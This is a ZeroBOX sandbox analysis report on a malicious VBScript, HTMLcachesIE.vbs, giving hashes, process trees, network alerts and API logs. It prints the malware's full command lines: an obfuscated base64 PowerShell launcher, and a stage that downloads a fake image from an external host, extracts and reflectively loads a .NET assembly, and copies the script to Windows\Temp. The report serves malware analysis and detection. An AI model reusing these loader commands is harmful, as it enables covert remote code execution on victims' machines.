Summary | ZeroBOX

HTMLcachesIE.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 Oct. 26, 2023, 5:18 p.m. Oct. 26, 2023, 5:20 p.m.
Size 275.8KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 b70068430fab03962b3fe2d15588c894
SHA256 8a38e1eae21dc4a5c8730fe252b518f817d22f4304dc4857592c7e7c9ebc42e8
CRC32 D8873898
ssdeep 3072:FyYdYjYMYiht0W6dI2mNnGt6V+wHt0btbg6Ub8uq9Vt06+HJHiaTpqfhH0zzKkmK:F9+
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLcachesIE.vbs

    2996
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      932
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"

        2476
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }

      2228

IP Address Status Action
104.21.45.138 Active Moloch
164.124.101.2 Active Moloch
23.67.53.17 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49166 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49166
104.21.45.138:443
C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:181
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes =
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method =
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40N
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: i4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc')
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: At line:1 char:244
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes =
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: etString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method =
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40N
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: i4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc')
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: At line:1 char:350
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes =
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: etString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: >';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.In
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method =
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40N
console_handle: 0x00000297
1 1 0

WriteConsoleW

buffer: i4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc')
console_handle: 0x000002a3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x000002bb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053e9c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f188
flags: 0
crypto_export_handle: 0x00000000
